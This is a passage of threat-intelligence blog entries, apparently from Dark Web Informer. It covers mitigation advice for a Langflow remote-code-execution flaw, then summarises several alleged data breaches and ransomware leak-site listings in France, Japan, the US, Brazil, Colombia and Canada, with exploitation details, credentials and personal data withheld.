------------------------------------------------------------------- | | ≤ 1.8.1 | Vulnerable | Upgrade to 1.9.0 | | 1.9.0+ | Fixed | Public build endpoint no longer accepts attacker-supplied flow data | ## Mitigation & Remediation Priority order, drawn from the [Langflow advisory](https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx) and [Sysdig's analysis](https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours): 1. **Upgrade to 1.9.0.** This is the complete fix, because it removes the attacker-controlled `data` parameter from the public build path. Patch before doing anything else. 2. **Remove Langflow from the public internet.** Put instances behind a VPN, private network, or authenticated proxy. The vulnerable endpoint is unauthenticated by design, so exposure is the core risk. 3. **Reduce privilege.** Do not run Langflow as root or under a broadly privileged cloud identity. Confirm what account and infrastructure the process can reach, since RCE inherits all of it. 4. **Rotate secrets.** Treat any API keys (OpenAI, Anthropic, AWS), database credentials, and SSH keys reachable from the instance as potentially compromised and rotate them. 5. **Hunt for compromise.** Check for the Trend Micro cryptominer indicators, unexpected outbound connections, new SSH keys or authorized\_keys entries, unfamiliar persistence, and high sustained CPU usage. Because exploitation predated any PoC, assume opportunistic hits on exposed instances. ## The Bigger Picture CVE-2026-33017 captures two trends at once. First, AI application infrastructure is now a deliberate target: frameworks like Langflow sit on a pile of high-value credentials and integrations, and attackers have noticed. Second, the window between disclosure and exploitation has effectively closed. Working exploits appeared within a day, built from nothing but the advisory, while the median organization still takes weeks to patch. When the patch window shrinks to hours, prevention alone is not enough; minimizing exposure, constraining privilege, and runtime detection become the line that actually holds. Treat your AI tooling like the internet-facing, secret-bearing application it really is. ## References - [Langflow Security Advisory - GHSA-vwmf-pq79-vjvx](https://github.com/langflow-ai/langflow/security/advisories/GHSA-vwmf-pq79-vjvx) - [NVD - CVE-2026-33017](https://nvd.nist.gov/vuln/detail/CVE-2026-33017) - [CISA - KEV Catalog Addition (2026-03-25)](https://www.cisa.gov/news-events/alerts/2026/03/25/cisa-adds-one-known-exploited-vulnerability-catalog) - [Sysdig - Compromised in 20 Hours](https://www.sysdig.com/blog/cve-2026-33017-how-attackers-compromised-langflow-ai-pipelines-in-20-hours) - [Trend Micro - From Langflow to Monero Cryptominer](https://www.trendmicro.com/en/research/26/f/from-langflow-to-monero-inside-cve-2026-33017-cryptominer.html) - [The Hacker News - Attacks Within 20 Hours of Disclosure](https://thehackernews.com/2026/03/critical-langflow-flaw-cve-2026-33017.html) - [Public Proof-of-Concept](https://github.com/omer-efe-curkus/CVE-2026-33017-Langflow-RCE-PoC) ### French Tour Operator Pachatours Allegedly Breached, Passport, Payment and Credential Data Exposed URL: https://darkwebinformer.com/french-tour-operator-pachatours-allegedly-breached-passport-payment-and-credential-data-exposed/ Last updated: 2026-06-30T16:43:18.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Travel ## French Tour Operator Pachatours Allegedly Breached, Passport, Payment and Credential Data Exposed A threat actor using the alias **misere**, crediting collaborators (ChimeraZ and NightBroker), has posted what they describe as a complete database breach of **Pachatours** (pachatours.fr / pachatours.pro), a French tour operator specializing in Hajj packages and Tunisian beach holidays. The actor claims to have extracted the full database (about **2GB, more than 2.2 million rows**) by exploiting an unauthenticated, unprotected web endpoint vulnerable to SQL injection. Per the post, the data covers **31,087 unique individuals** and includes **plaintext passport numbers, airline booking (PNR) codes, B2B travel-agency logins with cleartext passwords, payment transactions (VISA/CB), email-system credentials**, and hundreds of thousands of accounting entries, alongside the company's full product and pricing catalogue. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data31,087 persons AccessPoints-gated Country![France flag](https://flagcdn.com/w40/fr.png)France Actormisere ### ▣Post details TargetPachatours (pachatours.fr / .pro) Country![France flag](https://flagcdn.com/w40/fr.png)France SectorTravel / Tour Operator ClaimFull database extracted (\~2GB, 2.2M+ rows) DataPassports, payments, B2B creds, PNRs VectorSQL injection via unprotected web endpoint ObservedJun 30, 2026 Actorsmisere, ChimeraZ, NightBroker ### !Allegedly included - 31,087 unique individuals - Plaintext passport numbers - Airline PNR booking codes - B2B logins (cleartext passwords) - Payment transactions (VISA/CB) - Email-system credentials - 349,000+ accounting entries - Full voyage & pricing catalogue ### ◱Screenshot(s) [ ![Pachatours data breach forum post screenshot, June 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9234578239784529873562987356235786.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9234578239784529873562987356235786.png) [ ![Pachatours data breach forum post screenshot, June 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9234578239784529873562987356235787.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/9234578239784529873562987356235787.png) ### ⚠Potential impact This is a critical breach because it combines high-sensitivity identity, financial, and credential data with a full database compromise. The exposure reportedly includes **plaintext passport numbers** and airline booking codes, which enable identity theft and travel-related fraud, as well as payment-card transaction data. Most damaging from a security standpoint, the post claims B2B travel-agency logins were stored as **cleartext passwords** and that the company's email-sending credentials were exposed, which would let attackers impersonate the company, send convincing phishing to its agency partners, and pivot deeper into connected systems. With cleartext credentials and exposed mail infrastructure, the risk of follow-on business-email-compromise and account takeover is high. To avoid aiding further attacks, this report does not reproduce the specific systems, credentials, addresses, passport numbers, booking codes, or exploitation steps described in the post. Affected individuals face passport-fraud and phishing risk; the company should treat all exposed credentials as compromised and rotate them immediately. The authenticity and scope are unverified. ### iStatus Unverified The actor published a technical intrusion write-up, data samples, and a points-gated download; **none** of the exploitation specifics, server details, credentials, passport numbers, sample records, or download details are reproduced here. This post credits the same alias (ChimeraZ) seen in other recent European leaks. The claim has **not been independently confirmed** and Pachatours has not publicly addressed it. Given the exposed credentials and email infrastructure described, the company should rotate all credentials and review its public-facing systems urgently. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Municipal Police Records From the French Town of Le Pontet Allegedly Leaked URL: https://darkwebinformer.com/municipal-police-records-from-the-french-town-of-le-pontet-allegedly-leaked/ Last updated: 2026-06-30T16:45:25.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Local Government Label Disputed ## Municipal Police Records From the French Town of Le Pontet Allegedly Leaked A threat actor using the alias **ChimeraZ** has posted what they title “the EPM of the Le Pontet city,” framing it as a database from a **juvenile penitentiary for minors aged 13 to 17**, and claiming 62,172 lines (about 8.4MB) in CSV format. The sample data, however, does **not match that description**: it appears to be **municipal police and city-services records** for the town of Le Pontet (postal code 84130, near Avignon, France), including administrative complaints, vehicle-pound (fourrière) entries, lost-and-found items, and “vacation watch” (tranquillité vacances) registrations in which residents notify local police their home will be empty. The records reportedly expose residents' names, home addresses, phone numbers, and vehicle details. The juvenile-prison framing appears to be a mislabel the data does not support, but because the post explicitly invokes minors, this report applies heightened caution. The dataset's authenticity, true source, and scope are **unverified**. Severity HIGH Data62,172 lines AccessFree leak Country![France flag](https://flagcdn.com/w40/fr.png)France ActorChimeraZ ### ▣Post details TargetLe Pontet municipal services (84130, France) Country![France flag](https://flagcdn.com/w40/fr.png)France (Le Pontet) SectorGovernment / Local (Municipal Police) Actor's claim"EPM" juvenile-prison DB (disputed) Data appears to beMunicipal police / city-services records FilesComplaints, pound, lost-and-found, vacation watch ObservedJun 30, 2026 ActorChimeraZ ### !Allegedly included - 62,172 lines (claimed) - Residents' names - Home addresses - Phone numbers - Vehicle / pound records - Administrative complaints - Lost-and-found entries - Vacation home-watch records ### ◱Screenshot [ ![Le Pontet France municipal data leak forum post screenshot, June 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/8927365278369498762359876236987598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/8927365278369498762359876236987598723.png) ### ⚠Potential impact The data appears to expose municipal police and city-services records for a French town, which carries real-world risk even though it is not the high-sensitivity dataset the actor's “juvenile prison” label implies. The records reportedly include residents' names, home addresses, and phone numbers tied to interactions with local authorities. The most concerning element is the **vacation-watch data**, which identifies homes that residents have reported will be empty during specific date ranges, information that could directly facilitate burglary. The complaint, pound, and lost-property records additionally enable targeted phishing, impersonation, and social engineering referencing real, verifiable details. Separately, the actor's claim that this is a juvenile-detention database for minors aged 13 to 17 is **not supported by the sample shown**; if any portion of the data did relate to minors, the sensitivity would be far higher, which is why this report withholds all sample records, identifiers, and download links. The true source, authenticity, and scope are unverified. ### iStatus Unverified / disputed The actor posted samples and a large set of download mirrors; none of the sample records, residents' personal details, or download links are reproduced here. The data shown appears to be municipal police and city-services records rather than the juvenile-penitentiary database the post claims, and that discrepancy is unresolved. This is the same alias behind a recent European CRM leak. The claim has **not been independently confirmed**, and neither the town of Le Pontet nor any named establishment has publicly addressed it. [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Qilin Ransomware Claims Musashino University in Japan, Posts Sample Documents URL: https://darkwebinformer.com/qilin-ransomware-claims-musashino-university-in-japan-posts-sample-documents/ Last updated: 2026-06-29T17:56:47.000Z Ransomware // Leak-site intercept RW-2026-0629-MUS Unverified OPERATION **QILIN** aka Agenda Active since 2022 · \~1000+ victims in 2025 · double extortion · suspected Russia-linked Victim organization ## Musashino University Assessment SeverityHigh ConfidenceHigh A university in Tokyo, Japan, listed on the **Qilin** (WikiLeaks2) ransomware leak site, where the actor has posted sample documents and claims to hold data stolen from the institution. Authenticity, volume, and scope are **unverified**. 00 Data published Listed **2026-06-29**Published **2026-06-29** Telemetry GroupQilin Country![Japan flag](https://flagcdn.com/w40/jp.png)Japan SectorEducation Domainmusashino-u.ac.jp Data volume*Undisclosed* Samples15 images Listed2026-06-29 Status*Published* Auction listing Auction listingOpen Current price\-- BTC **06**Days: **13**Hrs: **23**Min: **07**Sec Place bid Preview [ Redacted Open image ![Qilin ransomware leak-site listing for Musashino University, redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/89723597826359876235987623598762358.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/89723597826359876235987623598762358.png) Assessment Appearance on the Qilin leak site with sample documents posted indicates the actor has exfiltrated data and is exposing samples to pressure the institution under a double-extortion model. As a university, Musashino holds large volumes of personal data on students, applicants, and staff, along with financial and administrative records, and any authentic exposure would carry risks of identity theft, fraud, and lasting privacy harm. Qilin is among the most active ransomware operations and has repeatedly targeted education and healthcare. The posted samples appear to include financial and administrative documents, though their authenticity and full scope remain **unverified**. No data, samples, or actor contact channels are reproduced here. Musashino University has not publicly addressed the claim as of this post. Want the non-redacted screenshots? **Paid subscribers** get full claim details and unredacted screenshots. Find this alert on the [ransomware feed](https://darkwebinformer.com/ransomware-feed/) after subscribing. [View pricing](https://darkwebinformer.com/pricing) [Dark Web Informer](https://darkwebinformer.com/)Threat Intelligence ### DragonForce Ransomware Leaks Data Allegedly Stolen from U.S. Healthcare Firm VIP Imaging URL: https://darkwebinformer.com/dragonforce-ransomware-leaks-data-allegedly-stolen-from-u-s-healthcare-firm-vip-imaging/ Last updated: 2026-06-29T16:51:51.000Z Ransomware // Leak-site intercept RW-2026-0628-VIP Unverified OPERATION **DRAGONFORCE** RaaS cartel Active since 2023 · \~580 known victims · RaaS cartel, double extortion · linked to Scattered Spider Victim organization ## VIP Imaging Assessment SeverityCritical ConfidenceHigh A U.S. mobile nuclear and cardiac imaging provider in Anaheim, California, listed on the **DragonForce** ransomware data-leak site, where the actor has published roughly **8.67 GB** of data allegedly stolen from the company. Authenticity and scope are **unverified**. 00 Data published Listed **2026-06-28**Published **2026-06-28** Telemetry GroupDragonForce Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorHealthcare / Medical imaging Domainvipimaging.com Data volume*8.67 GB* LocationAnaheim, CA Listed2026-06-28 Status*Published* Actor note > VIP Imaging is the largest mobile nuclear imaging company in Southern California, specializing in cardiac PET/CT and SPECT studies for cardiologists. The company is employee-owned and prides itself on having the best technicians and technology in the industry, ensuring high-quality patient care and support for proper billing. > > As posted on the leak site · reproduced verbatim · unverified Auction listing Auction listingOpen Current price\-- BTC **06**Days: **13**Hrs: **23**Min: **07**Sec Place bid Preview [ Redacted Open image ![DragonForce ransomware leak-site listing for VIP Imaging, redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/7982359786239487625987293876598723.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/7982359786239487625987293876598723.png) Assessment Appearance on an active leak site indicates the actor has published data it claims to have exfiltrated, so exposure has likely already occurred rather than being a future threat. As a healthcare provider handling cardiac imaging (PET/CT and SPECT), VIP Imaging holds sensitive patient health information, and any authentic exposure would carry risks of medical identity theft, insurance and billing fraud, and serious privacy harm that cannot be undone by changing a password. DragonForce operates a double-extortion, affiliate-driven model, and the data is listed as already published. No data, samples, or actor contact channels are reproduced here, and the authenticity, scope, and contents remain **unverified**. VIP Imaging has not publicly addressed the claim as of this post. Want the non-redacted screenshots? **Paid subscribers** get full claim details and unredacted screenshots. Find this alert on the [ransomware feed](https://darkwebinformer.com/ransomware-feed/) after subscribing. [View pricing](https://darkwebinformer.com/pricing) [Dark Web Informer](https://darkwebinformer.com/)Threat Intelligence ### Brazilian DETRAN SP Database of 13 Million Records Allegedly Leaked for Free URL: https://darkwebinformer.com/brazilian-detran-sp-database-of-13-million-records-allegedly-leaked-for-free/ Last updated: 2026-06-29T16:01:44.000Z Breach Report ![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Government ## Brazilian DETRAN SP Database of 13 Million Records Allegedly Leaked for Free A threat actor using the alias **pl4t0v** has posted what they describe as a database from **DETRAN SP**, the motor-vehicle and identity authority of São Paulo state in Brazil, claiming **13 million lines (about 1.59GB)** in SQLite format, and is sharing it for free. Per the sample and table schema, each record reportedly contains an exceptionally complete identity profile: full name, **CPF and RG national identification numbers**, date of birth, gender, **parents' names**, full residential address, multiple phone numbers, email addresses, marital status, and references to ID photos and biometric collection. Because this combines Brazil's core national identifiers with family and address data at scale, it is **extremely sensitive**. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data13M records PriceFree leak Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil Actorpl4t0v ### ▣Post details TargetDETRAN SP (São Paulo vehicle / ID authority) Country![Brazil flag](https://flagcdn.com/w40/br.png)Brazil (São Paulo) SectorGovernment / Motor Vehicle & ID Claim13M-line database leaked (1.59GB) DataCPF, RG, names, addresses, photos FormatSQLite (.db) ObservedJun 29, 2026 Actorpl4t0v ### !Allegedly included - \~13M records (claimed) - Full names - CPF & RG national IDs - Dates of birth & gender - Parents' names (filiação) - Full residential addresses - Phones & email addresses - ID photo & biometric references ### ◱Screenshot(s) [ ![DETRAN SP Brazil data breach forum post screenshot, June 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/13978561987649871649872365987231.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/13978561987649871649872365987231.png) [ ![DETRAN SP Brazil data breach table schema screenshot, June 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/13978561987649871649872365987232.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/13978561987649871649872365987232.png) ### ⚠Potential impact This is a critical exposure because it concerns Brazil's core national identifiers at massive scale. The records reportedly pair full names with **CPF and RG numbers**, dates of birth, parents' names, and full addresses, which is precisely the combination used in Brazil to open bank accounts, obtain credit and loans, and pass identity-verification checks. With this data, criminals can commit large-scale identity theft, financial fraud, and account takeover, and can craft highly convincing phishing and impersonation using verified personal details. The presence of references to ID photos and biometric collection adds a further, harder-to-remediate dimension, since national ID numbers and biometric data are permanent and cannot be reset. Because the dataset is reportedly free to download, any exposure may already be spreading widely. No records, identifiers, names, addresses, contact details, or download links are reproduced here. The authenticity and scope are unverified. ### iStatus Unverified A sample, the table schema, and a free download link were posted to a forum; the sample records, personal identifiers, and the download link are **not** reproduced here. The actor describes the data as a free leak of the DETRAN SP database. The claim has **not been independently confirmed**, and DETRAN SP has not publicly addressed it. Given the scale and sensitivity, this would warrant urgent attention from Brazilian authorities, including the ANPD (the national data-protection authority). Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Colombian Poultry Company Avícola El Madroño Allegedly Breached, 860MB of Data Leaked URL: https://darkwebinformer.com/colombian-poultry-company-avicola-el-madrono-allegedly-breached-860mb-of-data-leaked/ Last updated: 2026-06-29T15:32:37.000Z Breach Report ![Colombia flag](https://flagcdn.com/w40/co.png)Colombia Food / Retail ## Colombian Poultry Company Avícola El Madroño Allegedly Breached, 860MB of Data Leaked A threat actor using the alias **Saturne** has posted what they describe as an **860MB data leak** from **Avícola El Madroño S.A.** (avicolaelmadrono.com), a Colombian poultry and prepared-foods company based in Bucaramanga, and is sharing it for free. Alongside the data, the actor published a write-up claiming they reached it through a series of basic security failures, including **publicly exposed, unauthenticated diagnostic and backup interfaces, enabled directory listings, an open file-upload form, and database administration panels accessible with default or weak credentials**. Per the post, the exposed data includes accounting and payment records with people's names and ID numbers, customer files, and user-account tables, with application passwords stored as weak **MD5 hashes**. The dataset's authenticity and scope are **unverified**. Severity HIGH Data860MB AccessFree leak Country![Colombia flag](https://flagcdn.com/w40/co.png)Colombia ActorSaturne ### ▣Post details TargetAvícola El Madroño S.A. (avicolaelmadrono.com) Country![Colombia flag](https://flagcdn.com/w40/co.png)Colombia (Bucaramanga) SectorFood / Retail (poultry) Claim860MB of database and files leaked DataPII, payment records, credential hashes VectorExposed services + default/weak credentials FreshnessJun 2026 ObservedJun 29, 2026 ### !Allegedly included - 860MB of data (claimed) - Names & ID numbers - Payment / accounting records - Customer / client files - User-account tables - App passwords (MD5 hashes) - Database account hashes - Misconfigured infrastructure ### ◱Screenshot(s) [ ![Avicola El Madrono data breach forum post screenshot, June 2026 (1 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/279835698726398763429876253987623598721.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/279835698726398763429876253987623598721.png) [ ![Avicola El Madrono data breach forum post screenshot, June 2026 (2 of 2)](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/279835698726398763429876253987623598722.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/279835698726398763429876253987623598722.png) ### ⚠Potential impact This breach is serious because it reportedly combines customer and accounting PII with credential material and a full compromise of the company's database environment. The exposed records are said to include names, ID numbers, and payment amounts from accounting files, customer data, and user-account tables, which together enable identity theft, fraud, and targeted phishing against the company's customers and staff. The exposure of database account hashes and application passwords stored as weak MD5 hashes is especially concerning, since MD5 can often be cracked quickly, potentially handing attackers reusable credentials and deeper access. The actor's account also indicates the underlying infrastructure was extensively misconfigured, which raises the risk of repeat or copycat intrusions until the issues are fixed. To avoid aiding further attacks, this report does not reproduce the specific systems, credentials, addresses, file paths, or exploitation steps described in the post. The authenticity and scope are unverified. ### iStatus Unverified The actor published an intrusion narrative, a file listing, multiple download mirrors, and a contact handle; **none** of the exploitation specifics, internal system details, credentials, download links, or the actor's contact channel are reproduced here. This is the same alias behind other recent European and Latin American website leaks. The claim has **not been independently confirmed** and Avícola El Madroño has not publicly addressed it. Given the misconfigurations described, the company should treat all exposed credentials as compromised and urgently review its public-facing infrastructure. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### PLAY Ransomware Allegedly Claims U.S. Firm J&J Gaming URL: https://darkwebinformer.com/play-ransomware-allegedly-claims-u-s-firm-j-j-gaming/ Last updated: 2026-06-29T00:13:55.000Z Ransomware // Leak-site intercept RW-2026-0627-JJG Unverified OPERATION **PLAY** PlayCrypt Active since 2022 · \~1,200 known victims · double extortion · suspected Russia-linked Victim organization ## J&J Gaming Assessment SeverityMedium ConfidenceLow A U.S. amusement, arcade & attractions company added to the **PLAY** ransomware data-leak site. The actor claims theft of confidential corporate data and threatens to release it on the stated publication date. Volume and scope are **unverified**. 04 Days before publication Added **2026-06-27**Publishes **2026-07-01** Telemetry GroupPLAY Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorAmusement / Attractions Domainjjgaming.com Data volume*Undisclosed* Listing views1,065 Added2026-06-27 Publication*2026-07-01* Actor note > Private and personal confidential data, clients documents, budget, payroll, IDs, taxes, finance information and etc. > > As posted on the leak site · reproduced verbatim · unverified Auction listing Auction listingOpen Current price\-- BTC **06**Days: **13**Hrs: **23**Min: **07**Sec Place bid Preview [ Redacted Open image ![PLAY ransomware leak-site listing preview for J&J Gaming, redacted](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/97832576923765928763959876239587.png) ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/06/97832576923765928763959876239587.png) Assessment Appearance on an active leak site indicates the actor claims to hold exfiltrated data and is using a publication deadline as leverage under a double-extortion model. The named categories - payroll, IDs, tax and finance records, and client documents - would, if authentic, expose the organization and named individuals to fraud, identity theft, and targeted extortion, with risk of public release rising sharply once the date passes. No data, samples, or actor contact channels are reproduced here, and the volume and scope remain **unverified**. J&J Gaming has not publicly addressed the claim as of this post. Want the non-redacted screenshots? **Paid subscribers** get full claim details and unredacted screenshots. Find this alert on the [ransomware feed](https://darkwebinformer.com/ransomware-feed/) after subscribing. [View pricing](https://darkwebinformer.com/pricing) [Dark Web Informer](https://darkwebinformer.com/)Threat Intelligence ### Canadian Clinic WELL Health Kensington Medical Centres Allegedly Breached, 307,000 Patient Records Held to Ransom URL: https://darkwebinformer.com/canadian-clinic-well-health-kensington-medical-centres-allegedly-breached-307-000-patient-records-held-to-ransom/ Last updated: 2026-06-28T15:35:05.000Z Breach Report ![Canada flag](https://flagcdn.com/w40/ca.png)Canada Healthcare ## Canadian Clinic WELL Health Kensington Medical Centres Allegedly Breached, 307,000 Patient Records Held to Ransom A threat actor using the alias **Kazu** is extorting **WELL Health Kensington Medical Centres** (kmc.cortico.ca), a community medical clinic in Canada that provides family medicine, same-day appointments, virtual care, and specialist referrals to **patients of all ages**, operating as part of WELL Health Technologies on the Cortico platform. The actor claims to have stolen the personal data of **307,133 patients** and is demanding a **$70,000 ransom** with a deadline of **July 12, 2026**, threatening to sell the data publicly if the clinic does not pay. The dataset's authenticity and scope are **unverified**. Severity CRITICAL Data307,133 patients Demand$70K ransom Country![Canada flag](https://flagcdn.com/w40/ca.png)Canada ActorKazu ### ▣Post details TargetWELL Health Kensington Medical Centres Country![Canada flag](https://flagcdn.com/w40/ca.png)Canada SectorHealthcare Claim307,133 patients' PII stolen PlatformWELL Health / Cortico (kmc.cortico.ca) Demand$70,000 ransom DeadlineJul 12, 2026 ObservedJun 28, 2026 ### !Allegedly affected - 307,133 patient records (claimed) - Primary-care clinic patient PII - Patients of all ages - Family medicine / virtual care - $70,000 ransom demand - Deadline: Jul 12, 2026 - Pay-or-sell extortion - Fields not itemized in post ### ◱Screenshot [ ![WELL Health Kensington Medical Centres data breach forum post screenshot, June 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/987235987623958769287346987235689723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/987235987623958769287346987235689723.png) ### ⚠Potential impact This is a critical-tier incident because it targets a healthcare provider, exposing the data of hundreds of thousands of patients. Patient information held by a primary-care clinic is inherently sensitive, typically linking identity and contact details to a medical context, and the clinic states it serves **patients of all ages**, so the affected population may include children and other vulnerable individuals. The post does not itemize the exposed fields, but any confirmed exposure of clinic patient data would create risks of medical identity theft, insurance and prescription fraud, targeted extortion of patients, and serious privacy harm, with effects that cannot be undone by changing a password. The double-extortion framing (pay or the data is sold) raises the likelihood of public exposure if the deadline passes. No patient data, sample records, or attacker contact details are reproduced here. Authenticity and scope are unverified. ### iStatus Unverified The actor posted an extortion notice with a ransom demand, a deadline, and links to samples and contact channels; the samples and the attacker's contact details are **not** reproduced here. This listing matches a series of near-identical healthcare extortion posts by the same actor, several targeting Latin American providers, now extending to Canada. The claim has **not been independently confirmed** and WELL Health / Kensington Medical Centres has not publicly addressed it. The figure of 307,133 patients is notably large for a single community clinic and should be treated with caution pending verification. Want the non-redacted screenshots? **Paid subscribers** get all of the claim details and unredacted screenshots. Check out the [threat feed](https://darkwebinformer.com/threat-feed/) or [ransomware feed](https://darkwebinformer.com/ransomware-feed/) (whichever applies to this post), then after subscribing, search there for this alert to view the unredacted version. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### US Electronics Wholesaler Flawireless Allegedly Breached, Customer and Order Database Leaked URL: https://darkwebinformer.com/us-electronics-wholesaler-flawireless-allegedly-breached-customer-and-order-database-leaked/ Last updated: 2026-06-28T00:55:18.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States Retail ## US Electronics Wholesaler Flawireless Allegedly Breached, Customer and Order Database Leaked A threat actor using the alias **0xSec** has posted what they describe as the **database of Flawireless**, a US-based wholesaler of mobile phone accessories and refurbished electronics that also trades as **Techy Extra**. The leak appears to be a full export of the company's e-commerce and order-management system, spread across several CSV files: roughly **57,121 order records**, 3,251 invoices, 2,066 shipments, a 14,245-item product catalog, and a small set of discount codes. Per the samples, the customer-facing tables include names, company names and VAT numbers, full billing and shipping addresses, email addresses, phone and mobile numbers, and order, invoice, and payment metadata such as amounts, tax, and payment provider. **No passwords or full payment-card numbers appear in the samples.** The dataset's authenticity and scope are **unverified**. Severity MEDIUM Data57K+ orders AccessPoints-gated Country![United States flag](https://flagcdn.com/w40/us.png)USA Actor0xSec ### ▣Post details TargetFlawireless / Techy Extra (US wholesaler) Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorRetail / E-commerce (wholesale) ClaimFull e-commerce DB leaked (multiple CSVs) DataCustomer contact, addresses, order history FilesOrders 57.1K, invoices 3.3K, shipments 2.1K ObservedJun 28, 2026 Actor0xSec ### !Allegedly included - \~57,121 order records - 3,251 invoices, 2,066 shipments - Names, company names & VAT - Billing & shipping addresses - Emails, phones & mobiles - Order, invoice & payment metadata - 14,245-item product catalog - 6 discount codes ### ◱Screenshot(s) [ ![Flawireless US alleged leak Screenshot 1](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2398759287364987263587239587321.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2398759287364987263587239587321.png) [ ![Flawireless US alleged leak Screenshot 2](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2398759287364987263587239587322.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/06/2398759287364987263587239587322.png) ### ⚠Potential impact This is a full e-commerce and order-management export rather than a simple contact list, so its main value to an attacker is the pairing of customer identities with detailed transaction history. The customer-facing tables reportedly combine names, company names, and VAT numbers with full billing and shipping addresses, emails, and phone numbers, alongside order and invoice details such as products purchased, amounts, tax, and payment provider. Because many of the customers appear to be businesses and resellers, the strongest risk is convincing, well-informed phishing and business-email-compromise or invoice-fraud attempts that reference real orders, amounts, and shipping details. No passwords or 